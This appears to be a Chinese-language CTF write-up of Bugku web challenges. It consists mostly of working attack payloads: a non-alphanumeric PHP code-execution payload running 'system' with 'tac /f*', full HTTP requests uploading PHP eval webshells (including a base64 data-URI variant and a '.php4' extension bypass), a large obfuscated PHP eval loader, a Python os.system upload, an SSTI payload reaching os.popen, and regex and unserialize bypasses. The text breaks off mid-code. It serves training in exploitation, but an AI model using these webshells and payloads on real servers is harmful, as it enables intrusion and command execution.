Referer : http://114.67.175.224:18715/
Accept-Encoding : gzip, deflate
Accept-Language : zh-CN,zh;q=0.9,en;q=0.8
Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; PHPSESSID=uukfhesjl5h1t0mvdch88ome03; flag=flag%7B67e7bb4eb5eee5456d01992aeb60ac21%7D
Connection : close
code=%24_%3D%28_%2F_._%29%5B_%5D%3B%24_%2B%2B%3B%24__%3D%24_.%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D%24__.%24_%3B%24_%2B%2B%3B%24__%3D%24__.%24_%3B%24_%3D_.%24__%3B%24%24_%5B_%5D%28%24%24_%5B__%5D%29%3B&_=system&__=tac+%2Ff*
这里要编码不然总有地方不对
No one knows regex better than me 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<? php
error_reporting ( 0 );
$zero = $_REQUEST [ 'zero' ];
$first = $_REQUEST [ 'first' ];
$second = $zero . $first ;
if ( preg_match_all ( "/Yeedo|wants|a|girl|friend|or|a|flag/i" , $second )){
$key = $second ;
if ( preg_match ( "/\.\.|flag/" , $key )){
die ( "Noooood hacker!" );
} else {
$third = $first ;
if ( preg_match ( "/ \\ | \056\160\150\x70 /i" , $third )){
$end = substr ( $third , 5 );
highlight_file ( base64_decode ( $zero ) . $end ); //maybe flag in flag.php
}
}
}
else {
highlight_file ( __FILE__ );
}
就一点正则而已,不过这是个特性问题
1
2
3
4
5
6
7
<? php
$third = "fdaf|.php" ;
if ( preg_match ( "/ \\ | \056\160\150\x70 /i" , $third )){
$end = substr ( $third , 5 );
echo "yes \n " ;
echo $end ;
}
1
http://114.67.175.224:19193/?zero=ZmxhZw==&first=abcd|.php
字符?正则? 1
2
3
4
5
6
7
8
<? php
highlight_file ( '2.php' );
$key = 'flag{********************************}' ;
$IM = preg_match ( "/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i" , trim ( $_GET [ "id" ]), $match );
if ( $IM ){
die ( 'key is: ' . $key );
}
?>
key : 字符串 key。.\* : 匹配任意字符(除了换行符),0 次或多次。key.{4,7} : key 后跟 4 至 7 个任意字符。key:\/. : 字符串 key:/,其中的 / 被转义。/(.\*key) : 匹配一个斜杠 /,后面跟着任意字符,直到 key 字符串。[a-z] : 匹配一个小写字母。[[:punct:]] : 匹配一个标点符号。i : 表示不区分大小写的匹配。这个看着头有点晕啊
1
2
3
key.*key.{4,7}key:\/.*\/(.*key)[a-z][[:punct:]]
http://114.67.175.224:15541/?id=keyaaakeyaaaaakey:/a/akeya,
Flask_FileUpload Python的文件上传
1
2
import os
os.system('tac /flag')
写成png就可以了
xxx二手交易市场 这里还是打一个上传文件,注册登录之后上传头像,发现是进行了base64解密的并且这里使用的是data协议来上传,
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /user/upload HTTP / 1.1
Host : 114.67.175.224:10308
Content-Length : 64
X-Requested-With : XMLHttpRequest
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept : application/json, text/javascript, */*; q=0.01
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
Origin : http://114.67.175.224:10308
Referer : http://114.67.175.224:10308/User
Accept-Encoding : gzip, deflate
Accept-Language : zh-CN,zh;q=0.9,en;q=0.8
Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; PHPSESSID=uukfhesjl5h1t0mvdch88ome03; flag=flag%7B67e7bb4eb5eee5456d01992aeb60ac21%7D
Connection : close
image=data:image/php;base64,PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7Pz4=
文件上传 一直测去吧,后面发现可以混淆后缀
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
POST /index.php HTTP / 1.1
Host : 114.67.175.224:12453
Content-Length : 302
Cache-Control : max-age=0
Origin : http://114.67.175.224:12453
Content-Type : Multipart/form-data; boundary=----WebKitFormBoundaryWYvSV2LGFvAww1eP
Upgrade-Insecure-Requests : 1
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer : http://114.67.175.224:12453/
Accept-Encoding : gzip, deflate
Accept-Language : zh-CN,zh;q=0.9,en;q=0.8
Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; PHPSESSID=uukfhesjl5h1t0mvdch88ome03; flag=flag%7B67e7bb4eb5eee5456d01992aeb60ac21%7D
Connection : close
------WebKitFormBoundaryWYvSV2LGFvAww1eP
Content-Disposition: form-data; name="file"; filename="1.php4"
Content-Type: image/png
<?php eval($_POST[a]);?>
------WebKitFormBoundaryWYvSV2LGFvAww1eP
Content-Disposition: form-data; name="submit"
Submit
------WebKitFormBoundaryWYvSV2LGFvAww1eP--
主要就是这个细节
Multipart/form-data :表示请求体是以多部分形式编码的。这种编码方式通常用于表单上传文件或包含文件和其他字段的复杂数据。 getshell 1
2
3
4
5
6
7
8
9
<? php
define ( 'pfkzYUelxEGmVcdDNLTjXCSIgMBKOuHAFyRtaboqwJiQWvsZrPhn' , __FILE__ );
$cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ = urldecode ( "%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A" );
$BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC = $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 3 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 6 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 33 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 30 };
$hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ = $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 33 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 10 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 24 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 10 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 24 };
$vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV = $hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ { 0 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 18 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 3 } . $hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ { 0 } . $hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ { 1 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 24 };
$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR = $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 7 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 13 };
$BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC .= $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 22 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 36 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 29 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 26 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 30 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 32 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 35 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 26 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ { 30 };
eval ( $BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC ( "$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";eval('?>'.$BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC($hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ($vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR*2),$vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR),$vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,0,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR)))); " )); ?>
这玩意,估计是要分解然后不知道咋整了
1
2
3
4
<? php
highlight_file ( __FILE__ );
@ eval ( $_POST [ ymlisisisiook ]);
?>
链接之后发现不能动,这一看就是绕过disable_function,但是这里我的文件好像是被删除了,所以我重新下载了一下(挂代理,不然卡死你)
密码还是之前那个,链接就好了
点login咋没反应 查看源代码拿到源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<? php
error_reporting ( 0 );
$KEY = 'ctf.bugku.com' ;
include_once ( "flag.php" );
$cookie = $_COOKIE [ 'BUGKU' ];
if ( isset ( $_GET [ '16584' ])){
show_source ( __FILE__ );
}
elseif ( unserialize ( $cookie ) === " $KEY " )
{
echo " $flag " ;
}
else {
?>
<?php
}
?>
1
2
3
<? php
$payload = "ctf.bugku.com" ;
echo serialize ( $payload );
Simple_SSTI_1 1
http://114.67.175.224:12287/?flag={{g.pop.__globals__.__builtins__['__import__']('os').popen('env').read()}}
兔年大吉2 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
<? php
highlight_file ( __FILE__ );
error_reporting ( 0 );
class Happy {
private $cmd ;
private $content ;
public function __construct ( $cmd , $content )
{
$this -> cmd = $cmd ;
$this -> content = $content ;
}
public function __call ( $name , $arguments )
{
call_user_func ( $this -> cmd , $this -> content );
}
public function __wakeup ()
{
die ( "Wishes can be fulfilled" );
}
}
class Nevv {
private $happiness ;
public function __invoke ()
{
return $this -> happiness -> check ();
}
}
class Rabbit {
private $aspiration ;
public function __set ( $name , $val ){
return $this -> aspiration -> family ;
}
}
class Year {
public $key ;
public $rabbit ;
public function __construct ( $key )
{
$this -> key = $key ;
}
public function firecrackers ()
{
return $this -> rabbit -> wish = "allkill QAQ" ;
}
public function __get ( $name )
{
$name = $this -> rabbit ;
$name ();
}
public function __destruct ()
{
if ( $this -> key == "happy new year" ) {
$this -> firecrackers ();
